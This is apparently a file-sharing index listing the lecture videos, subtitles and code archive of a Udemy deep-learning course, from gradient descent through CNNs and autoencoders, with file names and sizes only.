[GigaCourse.Com] Udemy - A deep understanding of deep learning (with Python intro)

mp4   Hot:49   Size:21.97 GB   Created:2022-04-25 10:44:03   Update:2024-10-14 21:23:39  

File List

  • 0. Websites you may like/[CourseClub.ME].url 122 B
    0. Websites you may like/[GigaCourse.Com].url 49 B
    01 - Introduction/001 How to learn from this course.mp4 54.97 MB
    01 - Introduction/001 How to learn from this course_en.srt 12.48 KB
    01 - Introduction/002 Using Udemy like a pro.mp4 54.37 MB
    01 - Introduction/002 Using Udemy like a pro_en.srt 11.84 KB
    01 - Introduction/[CourseClub.Me].url 122 B
    01 - Introduction/[GigaCourse.Com].url 49 B
    02 - Download all course materials/001 DUDL-PythonCode.zip 660.79 KB
    02 - Download all course materials/001 Downloading and using the code.mp4 45.65 MB
    02 - Download all course materials/001 Downloading and using the code_en.srt 9.06 KB
    02 - Download all course materials/002 My policy on code-sharing.mp4 10.24 MB
    02 - Download all course materials/002 My policy on code-sharing_en.srt 2.43 KB
    03 - Concepts in deep learning/001 What is an artificial neural network.mp4 65.38 MB
    03 - Concepts in deep learning/001 What is an artificial neural network_en.srt 20.55 KB
    03 - Concepts in deep learning/002 How models learn.mp4 72.79 MB
    03 - Concepts in deep learning/002 How models learn_en.srt 18.07 KB
    03 - Concepts in deep learning/003 The role of DL in science and knowledge.mp4 34.76 MB
    03 - Concepts in deep learning/003 The role of DL in science and knowledge_en.srt 22.48 KB
    03 - Concepts in deep learning/004 Running experiments to understand DL.mp4 74.84 MB
    03 - Concepts in deep learning/004 Running experiments to understand DL_en.srt 18.53 KB
    03 - Concepts in deep learning/005 Are artificial neurons like biological neurons.mp4 114.65 MB
    03 - Concepts in deep learning/005 Are artificial neurons like biological neurons_en.srt 23.29 KB
    04 - About the Python tutorial/001 Should you watch the Python tutorial.mp4 23.77 MB
    04 - About the Python tutorial/001 Should you watch the Python tutorial_en.srt 5.92 KB
    05 - Math, numpy, PyTorch/001 PyTorch or TensorFlow.html 1.07 KB
    05 - Math, numpy, PyTorch/002 Introduction to this section.mp4 11.12 MB
    05 - Math, numpy, PyTorch/002 Introduction to this section_en.srt 2.8 KB
    05 - Math, numpy, PyTorch/003 Spectral theories in mathematics.mp4 51.06 MB
    05 - Math, numpy, PyTorch/003 Spectral theories in mathematics_en.srt 13.09 KB
    05 - Math, numpy, PyTorch/004 Terms and datatypes in math and computers.mp4 38.08 MB
    05 - Math, numpy, PyTorch/004 Terms and datatypes in math and computers_en.srt 10.27 KB
    05 - Math, numpy, PyTorch/005 Converting reality to numbers.mp4 33.21 MB
    05 - Math, numpy, PyTorch/005 Converting reality to numbers_en.srt 9.21 KB
    05 - Math, numpy, PyTorch/006 Vector and matrix transpose.mp4 37.66 MB
    05 - Math, numpy, PyTorch/006 Vector and matrix transpose_en.srt 9.63 KB
    05 - Math, numpy, PyTorch/007 OMG it's the dot product!.mp4 50.11 MB
    05 - Math, numpy, PyTorch/007 OMG it's the dot product!_en.srt 13.43 KB
    05 - Math, numpy, PyTorch/008 Matrix multiplication.mp4 85.67 MB
    05 - Math, numpy, PyTorch/008 Matrix multiplication_en.srt 19.84 KB
    05 - Math, numpy, PyTorch/009 Softmax.mp4 95.96 MB
    05 - Math, numpy, PyTorch/009 Softmax_en.srt 26.74 KB
    05 - Math, numpy, PyTorch/010 Logarithms.mp4 43.88 MB
    05 - Math, numpy, PyTorch/010 Logarithms_en.srt 11.05 KB
    05 - Math, numpy, PyTorch/011 Entropy and cross-entropy.mp4 106 MB
    05 - Math, numpy, PyTorch/011 Entropy and cross-entropy_en.srt 24.46 KB
    05 - Math, numpy, PyTorch/012 Minmax and argminargmax.mp4 88.21 MB
    05 - Math, numpy, PyTorch/012 Minmax and argminargmax_en.srt 17.49 KB
    05 - Math, numpy, PyTorch/013 Mean and variance.mp4 81.42 MB
    05 - Math, numpy, PyTorch/013 Mean and variance_en.srt 21.74 KB
    05 - Math, numpy, PyTorch/014 Random sampling and sampling variability.mp4 85.42 MB
    05 - Math, numpy, PyTorch/014 Random sampling and sampling variability_en.srt 15.75 KB
    05 - Math, numpy, PyTorch/015 Reproducible randomness via seeding.mp4 69.7 MB
    05 - Math, numpy, PyTorch/015 Reproducible randomness via seeding_en.srt 11.32 KB
    05 - Math, numpy, PyTorch/016 The t-test.mp4 81.36 MB
    05 - Math, numpy, PyTorch/016 The t-test_en.srt 18.69 KB
    05 - Math, numpy, PyTorch/017 Derivatives intuition and polynomials.mp4 80.3 MB
    05 - Math, numpy, PyTorch/017 Derivatives intuition and polynomials_en.srt 23.48 KB
    05 - Math, numpy, PyTorch/018 Derivatives find minima.mp4 45.47 MB
    05 - Math, numpy, PyTorch/018 Derivatives find minima_en.srt 11.71 KB
    05 - Math, numpy, PyTorch/019 Derivatives product and chain rules.mp4 55.63 MB
    05 - Math, numpy, PyTorch/019 Derivatives product and chain rules_en.srt 13.04 KB
    06 - Gradient descent/001 Overview of gradient descent.mp4 68.44 MB
    06 - Gradient descent/001 Overview of gradient descent_en.srt 20.1 KB
    06 - Gradient descent/002 What about local minima.mp4 67.08 MB
    06 - Gradient descent/002 What about local minima_en.srt 16.54 KB
    06 - Gradient descent/003 Gradient descent in 1D.mp4 119.29 MB
    06 - Gradient descent/003 Gradient descent in 1D_en.srt 23.78 KB
    06 - Gradient descent/004 CodeChallenge unfortunate starting value.mp4 77.09 MB
    06 - Gradient descent/004 CodeChallenge unfortunate starting value_en.srt 15.37 KB
    06 - Gradient descent/005 Gradient descent in 2D.mp4 96.38 MB
    06 - Gradient descent/005 Gradient descent in 2D_en.srt 20.74 KB
    06 - Gradient descent/006 CodeChallenge 2D gradient ascent.mp4 39.36 MB
    06 - Gradient descent/006 CodeChallenge 2D gradient ascent_en.srt 7.24 KB
    06 - Gradient descent/007 Parametric experiments on g.d.mp4 135.61 MB
    06 - Gradient descent/007 Parametric experiments on g.d_en.srt 26.16 KB
    06 - Gradient descent/008 CodeChallenge fixed vs. dynamic learning rate.mp4 113.6 MB
    06 - Gradient descent/008 CodeChallenge fixed vs. dynamic learning rate_en.srt 22.55 KB
    06 - Gradient descent/009 Vanishing and exploding gradients.mp4 30.24 MB
    06 - Gradient descent/009 Vanishing and exploding gradients_en.srt 8.71 KB
    06 - Gradient descent/010 Tangent Notebook revision history.mp4 9.88 MB
    06 - Gradient descent/010 Tangent Notebook revision history_en.srt 2.66 KB
    06 - Gradient descent/[CourseClub.Me].url 122 B
    06 - Gradient descent/[GigaCourse.Com].url 49 B
    07 - ANNs (Artificial Neural Networks)/001 The perceptron and ANN architecture.mp4 85.84 MB
    07 - ANNs (Artificial Neural Networks)/001 The perceptron and ANN architecture_en.srt 26.89 KB
    07 - ANNs (Artificial Neural Networks)/002 A geometric view of ANNs.mp4 70.88 MB
    07 - ANNs (Artificial Neural Networks)/002 A geometric view of ANNs_en.srt 18.65 KB
    07 - ANNs (Artificial Neural Networks)/003 ANN math part 1 (forward prop).mp4 73.12 MB
    07 - ANNs (Artificial Neural Networks)/003 ANN math part 1 (forward prop)_en.srt 21.38 KB
    07 - ANNs (Artificial Neural Networks)/004 ANN math part 2 (errors, loss, cost).mp4 48.47 MB
    07 - ANNs (Artificial Neural Networks)/004 ANN math part 2 (errors, loss, cost)_en.srt 13.39 KB
    07 - ANNs (Artificial Neural Networks)/005 ANN math part 3 (backprop).mp4 52.89 MB
    07 - ANNs (Artificial Neural Networks)/005 ANN math part 3 (backprop)_en.srt 14.71 KB
    07 - ANNs (Artificial Neural Networks)/006 ANN for regression.mp4 135.5 MB
    07 - ANNs (Artificial Neural Networks)/006 ANN for regression_en.srt 34.52 KB
    07 - ANNs (Artificial Neural Networks)/007 CodeChallenge manipulate regression slopes.mp4 139.12 MB
    07 - ANNs (Artificial Neural Networks)/007 CodeChallenge manipulate regression slopes_en.srt 27.25 KB
    07 - ANNs (Artificial Neural Networks)/008 ANN for classifying qwerties.mp4 151.12 MB
    07 - ANNs (Artificial Neural Networks)/008 ANN for classifying qwerties_en.srt 32.73 KB
    07 - ANNs (Artificial Neural Networks)/009 Learning rates comparison.mp4 168.64 MB
    07 - ANNs (Artificial Neural Networks)/009 Learning rates comparison_en.srt 34.85 KB
    07 - ANNs (Artificial Neural Networks)/010 Multilayer ANN.mp4 144.7 MB
    07 - ANNs (Artificial Neural Networks)/010 Multilayer ANN_en.srt 28.29 KB
    07 - ANNs (Artificial Neural Networks)/011 Linear solutions to linear problems.mp4 50.37 MB
    07 - ANNs (Artificial Neural Networks)/011 Linear solutions to linear problems_en.srt 11.73 KB
    07 - ANNs (Artificial Neural Networks)/012 Why multilayer linear models don't exist.mp4 26.46 MB
    07 - ANNs (Artificial Neural Networks)/012 Why multilayer linear models don't exist_en.srt 8.86 KB
    07 - ANNs (Artificial Neural Networks)/013 Multi-output ANN (iris dataset).mp4 186.77 MB
    07 - ANNs (Artificial Neural Networks)/013 Multi-output ANN (iris dataset)_en.srt 36.08 KB
    07 - ANNs (Artificial Neural Networks)/014 CodeChallenge more qwerties!.mp4 95.1 MB
    07 - ANNs (Artificial Neural Networks)/014 CodeChallenge more qwerties!_en.srt 17.13 KB
    07 - ANNs (Artificial Neural Networks)/015 Comparing the number of hidden units.mp4 71.15 MB
    07 - ANNs (Artificial Neural Networks)/015 Comparing the number of hidden units_en.srt 14.09 KB
    07 - ANNs (Artificial Neural Networks)/016 Depth vs. breadth number of parameters.mp4 132.07 MB
    07 - ANNs (Artificial Neural Networks)/016 Depth vs. breadth number of parameters_en.srt 24.75 KB
    07 - ANNs (Artificial Neural Networks)/017 Defining models using sequential vs. class.mp4 89.48 MB
    07 - ANNs (Artificial Neural Networks)/017 Defining models using sequential vs. class_en.srt 18.45 KB
    07 - ANNs (Artificial Neural Networks)/018 Model depth vs. breadth.mp4 158.91 MB
    07 - ANNs (Artificial Neural Networks)/018 Model depth vs. breadth_en.srt 29.73 KB
    07 - ANNs (Artificial Neural Networks)/019 CodeChallenge convert sequential to class.mp4 51.44 MB
    07 - ANNs (Artificial Neural Networks)/019 CodeChallenge convert sequential to class_en.srt 9.36 KB
    07 - ANNs (Artificial Neural Networks)/020 Diversity of ANN visual representations.html 517 B
    07 - ANNs (Artificial Neural Networks)/021 Reflection Are DL models understandable yet.mp4 58.59 MB
    07 - ANNs (Artificial Neural Networks)/021 Reflection Are DL models understandable yet_en.srt 11.95 KB
    08 - Overfitting and cross-validation/001 What is overfitting and is it as bad as they say.mp4 73.13 MB
    08 - Overfitting and cross-validation/001 What is overfitting and is it as bad as they say_en.srt 17.66 KB
    08 - Overfitting and cross-validation/002 Cross-validation.mp4 88.19 MB
    08 - Overfitting and cross-validation/002 Cross-validation_en.srt 24.05 KB
    08 - Overfitting and cross-validation/003 Generalization.mp4 32.44 MB
    08 - Overfitting and cross-validation/003 Generalization_en.srt 8.5 KB
    08 - Overfitting and cross-validation/004 Cross-validation -- manual separation.mp4 98.3 MB
    08 - Overfitting and cross-validation/004 Cross-validation -- manual separation_en.srt 17.89 KB
    08 - Overfitting and cross-validation/005 Cross-validation -- scikitlearn.mp4 142.88 MB
    08 - Overfitting and cross-validation/005 Cross-validation -- scikitlearn_en.srt 29.31 KB
    08 - Overfitting and cross-validation/006 Cross-validation -- DataLoader.mp4 172.32 MB
    08 - Overfitting and cross-validation/006 Cross-validation -- DataLoader_en.srt 27.51 KB
    08 - Overfitting and cross-validation/007 Splitting data into train, devset, test.mp4 79.21 MB
    08 - Overfitting and cross-validation/007 Splitting data into train, devset, test_en.srt 13.31 KB
    08 - Overfitting and cross-validation/008 Cross-validation on regression.mp4 60.35 MB
    08 - Overfitting and cross-validation/008 Cross-validation on regression_en.srt 11.53 KB
    09 - Regularization/001 Regularization Concept and methods.mp4 80.05 MB
    09 - Regularization/001 Regularization Concept and methods_en.srt 18.35 KB
    09 - Regularization/002 train() and eval() modes.mp4 38.34 MB
    09 - Regularization/002 train() and eval() modes_en.srt 9.82 KB
    09 - Regularization/003 Dropout regularization.mp4 138.39 MB
    09 - Regularization/003 Dropout regularization_en.srt 30.42 KB
    09 - Regularization/004 Dropout regularization in practice.mp4 183.23 MB
    09 - Regularization/004 Dropout regularization in practice_en.srt 32.13 KB
    09 - Regularization/005 Dropout example 2.mp4 53.87 MB
    09 - Regularization/005 Dropout example 2_en.srt 8.83 KB
    09 - Regularization/006 Weight regularization (L1L2) math.mp4 85.41 MB
    09 - Regularization/006 Weight regularization (L1L2) math_en.srt 26.08 KB
    09 - Regularization/007 L2 regularization in practice.mp4 110.47 MB
    09 - Regularization/007 L2 regularization in practice_en.srt 18.27 KB
    09 - Regularization/008 L1 regularization in practice.mp4 99.44 MB
    09 - Regularization/008 L1 regularization in practice_en.srt 16.79 KB
    09 - Regularization/009 Training in mini-batches.mp4 62.12 MB
    09 - Regularization/009 Training in mini-batches_en.srt 16.24 KB
    09 - Regularization/010 Batch training in action.mp4 89.1 MB
    09 - Regularization/010 Batch training in action_en.srt 15.06 KB
    09 - Regularization/011 The importance of equal batch sizes.mp4 60.11 MB
    09 - Regularization/011 The importance of equal batch sizes_en.srt 9.12 KB
    09 - Regularization/012 CodeChallenge Effects of mini-batch size.mp4 95.42 MB
    09 - Regularization/012 CodeChallenge Effects of mini-batch size_en.srt 17.42 KB
    10 - Metaparameters (activations, optimizers)/001 What are metaparameters.mp4 32.7 MB
    10 - Metaparameters (activations, optimizers)/001 What are metaparameters_en.srt 7.09 KB
    10 - Metaparameters (activations, optimizers)/002 The wine quality dataset.mp4 143.5 MB
    10 - Metaparameters (activations, optimizers)/002 The wine quality dataset_en.srt 24.77 KB
    10 - Metaparameters (activations, optimizers)/003 CodeChallenge Minibatch size in the wine dataset.mp4 118.79 MB
    10 - Metaparameters (activations, optimizers)/003 CodeChallenge Minibatch size in the wine dataset_en.srt 22.22 KB
    10 - Metaparameters (activations, optimizers)/004 Data normalization.mp4 59.81 MB
    10 - Metaparameters (activations, optimizers)/004 Data normalization_en.srt 18.96 KB
    10 - Metaparameters (activations, optimizers)/005 The importance of data normalization.mp4 64.65 MB
    10 - Metaparameters (activations, optimizers)/005 The importance of data normalization_en.srt 13.26 KB
    10 - Metaparameters (activations, optimizers)/006 Batch normalization.mp4 76.81 MB
    10 - Metaparameters (activations, optimizers)/006 Batch normalization_en.srt 18.02 KB
    10 - Metaparameters (activations, optimizers)/007 Batch normalization in practice.mp4 61.76 MB
    10 - Metaparameters (activations, optimizers)/007 Batch normalization in practice_en.srt 10.64 KB
    10 - Metaparameters (activations, optimizers)/008 CodeChallenge Batch-normalize the qwerties.mp4 41.43 MB
    10 - Metaparameters (activations, optimizers)/008 CodeChallenge Batch-normalize the qwerties_en.srt 7.23 KB
    10 - Metaparameters (activations, optimizers)/009 Activation functions.mp4 97.03 MB
    10 - Metaparameters (activations, optimizers)/009 Activation functions_en.srt 25.53 KB
    10 - Metaparameters (activations, optimizers)/010 Activation functions in PyTorch.mp4 91.46 MB
    10 - Metaparameters (activations, optimizers)/010 Activation functions in PyTorch_en.srt 16.35 KB
    10 - Metaparameters (activations, optimizers)/011 Activation functions comparison.mp4 73.9 MB
    10 - Metaparameters (activations, optimizers)/011 Activation functions comparison_en.srt 13.08 KB
    10 - Metaparameters (activations, optimizers)/012 CodeChallenge Compare relu variants.mp4 63.97 MB
    10 - Metaparameters (activations, optimizers)/012 CodeChallenge Compare relu variants_en.srt 10.87 KB
    10 - Metaparameters (activations, optimizers)/013 CodeChallenge Predict sugar.mp4 122.1 MB
    10 - Metaparameters (activations, optimizers)/013 CodeChallenge Predict sugar_en.srt 24.06 KB
    10 - Metaparameters (activations, optimizers)/014 Loss functions.mp4 90.3 MB
    10 - Metaparameters (activations, optimizers)/014 Loss functions_en.srt 23.32 KB
    10 - Metaparameters (activations, optimizers)/015 Loss functions in PyTorch.mp4 138.1 MB
    10 - Metaparameters (activations, optimizers)/015 Loss functions in PyTorch_en.srt 25.85 KB
    10 - Metaparameters (activations, optimizers)/016 More practice with multioutput ANNs.mp4 99.8 MB
    10 - Metaparameters (activations, optimizers)/016 More practice with multioutput ANNs_en.srt 19.57 KB
    10 - Metaparameters (activations, optimizers)/017 Optimizers (minibatch, momentum).mp4 98.07 MB
    10 - Metaparameters (activations, optimizers)/017 Optimizers (minibatch, momentum)_en.srt 26.39 KB
    10 - Metaparameters (activations, optimizers)/018 SGD with momentum.mp4 62.1 MB
    10 - Metaparameters (activations, optimizers)/018 SGD with momentum_en.srt 11.12 KB
    10 - Metaparameters (activations, optimizers)/019 Optimizers (RMSprop, Adam).mp4 76.73 MB
    10 - Metaparameters (activations, optimizers)/019 Optimizers (RMSprop, Adam)_en.srt 21.25 KB
    10 - Metaparameters (activations, optimizers)/020 Optimizers comparison.mp4 86.88 MB
    10 - Metaparameters (activations, optimizers)/020 Optimizers comparison_en.srt 14.1 KB
    10 - Metaparameters (activations, optimizers)/021 CodeChallenge Optimizers and... something.mp4 49.77 MB
    10 - Metaparameters (activations, optimizers)/021 CodeChallenge Optimizers and... something_en.srt 9.03 KB
    10 - Metaparameters (activations, optimizers)/022 CodeChallenge Adam with L2 regularization.mp4 53 MB
    10 - Metaparameters (activations, optimizers)/022 CodeChallenge Adam with L2 regularization_en.srt 9.94 KB
    10 - Metaparameters (activations, optimizers)/023 Learning rate decay.mp4 96.9 MB
    10 - Metaparameters (activations, optimizers)/023 Learning rate decay_en.srt 17.23 KB
    10 - Metaparameters (activations, optimizers)/024 How to pick the right metaparameters.mp4 61.74 MB
    10 - Metaparameters (activations, optimizers)/024 How to pick the right metaparameters_en.srt 16.08 KB
    11 - FFNs (Feed-Forward Networks)/001 What are fully-connected and feedforward networks.mp4 25.53 MB
    11 - FFNs (Feed-Forward Networks)/001 What are fully-connected and feedforward networks_en.srt 6.7 KB
    11 - FFNs (Feed-Forward Networks)/002 The MNIST dataset.mp4 101.38 MB
    11 - FFNs (Feed-Forward Networks)/002 The MNIST dataset_en.srt 17.7 KB
    11 - FFNs (Feed-Forward Networks)/003 FFN to classify digits.mp4 161.85 MB
    11 - FFNs (Feed-Forward Networks)/003 FFN to classify digits_en.srt 31.66 KB
    11 - FFNs (Feed-Forward Networks)/004 CodeChallenge Binarized MNIST images.mp4 40.78 MB
    11 - FFNs (Feed-Forward Networks)/004 CodeChallenge Binarized MNIST images_en.srt 7.1 KB
    11 - FFNs (Feed-Forward Networks)/005 CodeChallenge Data normalization.mp4 96.25 MB
    11 - FFNs (Feed-Forward Networks)/005 CodeChallenge Data normalization_en.srt 23.57 KB
    11 - FFNs (Feed-Forward Networks)/006 Distributions of weights pre- and post-learning.mp4 116.26 MB
    11 - FFNs (Feed-Forward Networks)/006 Distributions of weights pre- and post-learning_en.srt 21.22 KB
    11 - FFNs (Feed-Forward Networks)/007 CodeChallenge MNIST and breadth vs. depth.mp4 95.21 MB
    11 - FFNs (Feed-Forward Networks)/007 CodeChallenge MNIST and breadth vs. depth_en.srt 17.09 KB
    11 - FFNs (Feed-Forward Networks)/008 CodeChallenge Optimizers and MNIST.mp4 46.26 MB
    11 - FFNs (Feed-Forward Networks)/008 CodeChallenge Optimizers and MNIST_en.srt 9.56 KB
    11 - FFNs (Feed-Forward Networks)/009 Scrambled MNIST.mp4 60.17 MB
    11 - FFNs (Feed-Forward Networks)/009 Scrambled MNIST_en.srt 10.82 KB
    11 - FFNs (Feed-Forward Networks)/010 Shifted MNIST.mp4 77.91 MB
    11 - FFNs (Feed-Forward Networks)/010 Shifted MNIST_en.srt 15.84 KB
    11 - FFNs (Feed-Forward Networks)/011 CodeChallenge The mystery of the missing 7.mp4 74.25 MB
    11 - FFNs (Feed-Forward Networks)/011 CodeChallenge The mystery of the missing 7_en.srt 15.17 KB
    11 - FFNs (Feed-Forward Networks)/012 Universal approximation theorem.mp4 49.18 MB
    11 - FFNs (Feed-Forward Networks)/012 Universal approximation theorem_en.srt 11.28 KB
    12 - More on data/001 Anatomy of a torch dataset and dataloader.mp4 135.84 MB
    12 - More on data/001 Anatomy of a torch dataset and dataloader_en.srt 25.42 KB
    12 - More on data/002 Data size and network size.mp4 135.67 MB
    12 - More on data/002 Data size and network size_en.srt 22.54 KB
    12 - More on data/003 CodeChallenge unbalanced data.mp4 166.26 MB
    12 - More on data/003 CodeChallenge unbalanced data_en.srt 28.21 KB
    12 - More on data/004 What to do about unbalanced designs.mp4 54.21 MB
    12 - More on data/004 What to do about unbalanced designs_en.srt 10.75 KB
    12 - More on data/005 Data oversampling in MNIST.mp4 122.59 MB
    12 - More on data/005 Data oversampling in MNIST_en.srt 23.24 KB
    12 - More on data/006 Data noise augmentation (with devset+test).mp4 106.09 MB
    12 - More on data/006 Data noise augmentation (with devset+test)_en.srt 17.93 KB
    12 - More on data/007 Data feature augmentation.mp4 158.27 MB
    12 - More on data/007 Data feature augmentation_en.srt 27.3 KB
    12 - More on data/008 Getting data into colab.mp4 43.75 MB
    12 - More on data/008 Getting data into colab_en.srt 8.52 KB
    12 - More on data/009 Save and load trained models.mp4 55.71 MB
    12 - More on data/009 Save and load trained models_en.srt 8.61 KB
    12 - More on data/010 Save the best-performing model.mp4 126.5 MB
    12 - More on data/010 Save the best-performing model_en.srt 21.15 KB
    12 - More on data/011 Where to find online datasets.mp4 41.7 MB
    12 - More on data/011 Where to find online datasets_en.srt 7.89 KB
    13 - Measuring model performance/001 Two perspectives of the world.mp4 40.01 MB
    13 - Measuring model performance/001 Two perspectives of the world_en.srt 9.91 KB
    13 - Measuring model performance/002 Accuracy, precision, recall, F1.mp4 72.58 MB
    13 - Measuring model performance/002 Accuracy, precision, recall, F1_en.srt 17.32 KB
    13 - Measuring model performance/003 APRF in code.mp4 51.79 MB
    13 - Measuring model performance/003 APRF in code_en.srt 9.03 KB
    13 - Measuring model performance/004 APRF example 1 wine quality.mp4 107.35 MB
    13 - Measuring model performance/004 APRF example 1 wine quality_en.srt 18.52 KB
    13 - Measuring model performance/005 APRF example 2 MNIST.mp4 98.62 MB
    13 - Measuring model performance/005 APRF example 2 MNIST_en.srt 16.52 KB
    13 - Measuring model performance/006 CodeChallenge MNIST with unequal groups.mp4 25.07 MB
    13 - Measuring model performance/006 CodeChallenge MNIST with unequal groups_en.srt 12.25 KB
    13 - Measuring model performance/007 Computation time.mp4 81.73 MB
    13 - Measuring model performance/007 Computation time_en.srt 13.73 KB
    13 - Measuring model performance/008 Better performance in test than train.mp4 44.83 MB
    13 - Measuring model performance/008 Better performance in test than train_en.srt 11.54 KB
    14 - FFN milestone projects/001 Project 1 A gratuitously complex adding machine.mp4 48.55 MB
    14 - FFN milestone projects/001 Project 1 A gratuitously complex adding machine_en.srt 10.33 KB
    14 - FFN milestone projects/002 Project 1 My solution.mp4 99.75 MB
    14 - FFN milestone projects/002 Project 1 My solution_en.srt 16.3 KB
    14 - FFN milestone projects/003 Project 2 Predicting heart disease.mp4 50.61 MB
    14 - FFN milestone projects/003 Project 2 Predicting heart disease_en.srt 10.57 KB
    14 - FFN milestone projects/004 Project 2 My solution.mp4 155.73 MB
    14 - FFN milestone projects/004 Project 2 My solution_en.srt 26.69 KB
    14 - FFN milestone projects/005 Project 3 FFN for missing data interpolation.mp4 45.39 MB
    14 - FFN milestone projects/005 Project 3 FFN for missing data interpolation_en.srt 13.85 KB
    14 - FFN milestone projects/006 Project 3 My solution.mp4 75.48 MB
    14 - FFN milestone projects/006 Project 3 My solution_en.srt 11.43 KB
    14 - FFN milestone projects/[CourseClub.Me].url 122 B
    14 - FFN milestone projects/[GigaCourse.Com].url 49 B
    15 - Weight inits and investigations/001 Explanation of weight matrix sizes.mp4 68.98 MB
    15 - Weight inits and investigations/001 Explanation of weight matrix sizes_en.srt 16.55 KB
    15 - Weight inits and investigations/002 A surprising demo of weight initializations.mp4 121.57 MB
    15 - Weight inits and investigations/002 A surprising demo of weight initializations_en.srt 23 KB
    15 - Weight inits and investigations/003 Theory Why and how to initialize weights.mp4 79.41 MB
    15 - Weight inits and investigations/003 Theory Why and how to initialize weights_en.srt 17.59 KB
    15 - Weight inits and investigations/004 CodeChallenge Weight variance inits.mp4 103.96 MB
    15 - Weight inits and investigations/004 CodeChallenge Weight variance inits_en.srt 17.75 KB
    15 - Weight inits and investigations/005 Xavier and Kaiming initializations.mp4 134.08 MB
    15 - Weight inits and investigations/005 Xavier and Kaiming initializations_en.srt 21.7 KB
    15 - Weight inits and investigations/006 CodeChallenge Xavier vs. Kaiming.mp4 126.5 MB
    15 - Weight inits and investigations/006 CodeChallenge Xavier vs. Kaiming_en.srt 23.71 KB
    15 - Weight inits and investigations/007 CodeChallenge Identically random weights.mp4 88.17 MB
    15 - Weight inits and investigations/007 CodeChallenge Identically random weights_en.srt 17.26 KB
    15 - Weight inits and investigations/008 Freezing weights during learning.mp4 93.15 MB
    15 - Weight inits and investigations/008 Freezing weights during learning_en.srt 18.54 KB
    15 - Weight inits and investigations/009 Learning-related changes in weights.mp4 146.78 MB
    15 - Weight inits and investigations/009 Learning-related changes in weights_en.srt 31.55 KB
    15 - Weight inits and investigations/010 Use default inits or apply your own.mp4 28.05 MB
    15 - Weight inits and investigations/010 Use default inits or apply your own_en.srt 6.12 KB
    16 - Autoencoders/001 What are autoencoders and what do they do.mp4 49.04 MB
    16 - Autoencoders/001 What are autoencoders and what do they do_en.srt 16.3 KB
    16 - Autoencoders/002 Denoising MNIST.mp4 118.53 MB
    16 - Autoencoders/002 Denoising MNIST_en.srt 21.93 KB
    16 - Autoencoders/003 CodeChallenge How many units.mp4 135.38 MB
    16 - Autoencoders/003 CodeChallenge How many units_en.srt 27.8 KB
    16 - Autoencoders/004 AEs for occlusion.mp4 138.2 MB
    16 - Autoencoders/004 AEs for occlusion_en.srt 24.48 KB
    16 - Autoencoders/005 The latent code of MNIST.mp4 161.81 MB
    16 - Autoencoders/005 The latent code of MNIST_en.srt 30.47 KB
    16 - Autoencoders/006 Autoencoder with tied weights.mp4 177.74 MB
    16 - Autoencoders/006 Autoencoder with tied weights_en.srt 33.51 KB
    17 - Running models on a GPU/001 What is a GPU and why use it.mp4 88.73 MB
    17 - Running models on a GPU/001 What is a GPU and why use it_en.srt 21.62 KB
    17 - Running models on a GPU/002 Implementation.mp4 76.6 MB
    17 - Running models on a GPU/002 Implementation_en.srt 14.24 KB
    17 - Running models on a GPU/003 CodeChallenge Run an experiment on the GPU.mp4 52.99 MB
    17 - Running models on a GPU/003 CodeChallenge Run an experiment on the GPU_en.srt 9.43 KB
    18 - Convolution and transformations/001 Convolution concepts.mp4 97.99 MB
    18 - Convolution and transformations/001 Convolution concepts_en.srt 31.18 KB
    18 - Convolution and transformations/002 Feature maps and convolution kernels.mp4 70.41 MB
    18 - Convolution and transformations/002 Feature maps and convolution kernels_en.srt 13.45 KB
    18 - Convolution and transformations/003 Convolution in code.mp4 173.1 MB
    18 - Convolution and transformations/003 Convolution in code_en.srt 29.39 KB
    18 - Convolution and transformations/004 Convolution parameters (stride, padding).mp4 66.93 MB
    18 - Convolution and transformations/004 Convolution parameters (stride, padding)_en.srt 17.41 KB
    18 - Convolution and transformations/005 The Conv2 class in PyTorch.mp4 100.19 MB
    18 - Convolution and transformations/005 The Conv2 class in PyTorch_en.srt 18.19 KB
    18 - Convolution and transformations/006 CodeChallenge Choose the parameters.mp4 58.71 MB
    18 - Convolution and transformations/006 CodeChallenge Choose the parameters_en.srt 9.75 KB
    18 - Convolution and transformations/007 Transpose convolution.mp4 92.89 MB
    18 - Convolution and transformations/007 Transpose convolution_en.srt 19.17 KB
    18 - Convolution and transformations/008 Maxmean pooling.mp4 89.07 MB
    18 - Convolution and transformations/008 Maxmean pooling_en.srt 25.71 KB
    18 - Convolution and transformations/009 Pooling in PyTorch.mp4 81.02 MB
    18 - Convolution and transformations/009 Pooling in PyTorch_en.srt 18.9 KB
    18 - Convolution and transformations/010 To pool or to stride.mp4 55.51 MB
    18 - Convolution and transformations/010 To pool or to stride_en.srt 13.75 KB
    18 - Convolution and transformations/011 Image transforms.mp4 129.9 MB
    18 - Convolution and transformations/011 Image transforms_en.srt 23.01 KB
    18 - Convolution and transformations/012 Creating and using custom DataLoaders.mp4 139.53 MB
    18 - Convolution and transformations/012 Creating and using custom DataLoaders_en.srt 25.5 KB
    19 - Understand and design CNNs/001 The canonical CNN architecture.mp4 55.83 MB
    19 - Understand and design CNNs/001 The canonical CNN architecture_en.srt 15.12 KB
    19 - Understand and design CNNs/002 CNN to classify MNIST digits.mp4 200.33 MB
    19 - Understand and design CNNs/002 CNN to classify MNIST digits_en.srt 36.6 KB
    19 - Understand and design CNNs/003 CNN on shifted MNIST.mp4 58.34 MB
    19 - Understand and design CNNs/003 CNN on shifted MNIST_en.srt 11.66 KB
    19 - Understand and design CNNs/004 Classify Gaussian blurs.mp4 185.14 MB
    19 - Understand and design CNNs/004 Classify Gaussian blurs_en.srt 33 KB
    19 - Understand and design CNNs/005 Examine feature map activations.mp4 260.56 MB
    19 - Understand and design CNNs/005 Examine feature map activations_en.srt 39 KB
    19 - Understand and design CNNs/006 CodeChallenge Softcode internal parameters.mp4 120.1 MB
    19 - Understand and design CNNs/006 CodeChallenge Softcode internal parameters_en.srt 24.12 KB
    19 - Understand and design CNNs/007 CodeChallenge How wide the FC.mp4 94.08 MB
    19 - Understand and design CNNs/007 CodeChallenge How wide the FC_en.srt 15.86 KB
    19 - Understand and design CNNs/008 Do autoencoders clean Gaussians.mp4 147.88 MB
    19 - Understand and design CNNs/008 Do autoencoders clean Gaussians_en.srt 23.5 KB
    19 - Understand and design CNNs/009 CodeChallenge AEs and occluded Gaussians.mp4 28.58 MB
    19 - Understand and design CNNs/009 CodeChallenge AEs and occluded Gaussians_en.srt 13.49 KB
    19 - Understand and design CNNs/010 CodeChallenge Custom loss functions.mp4 132.89 MB
    19 - Understand and design CNNs/010 CodeChallenge Custom loss functions_en.srt 28.77 KB
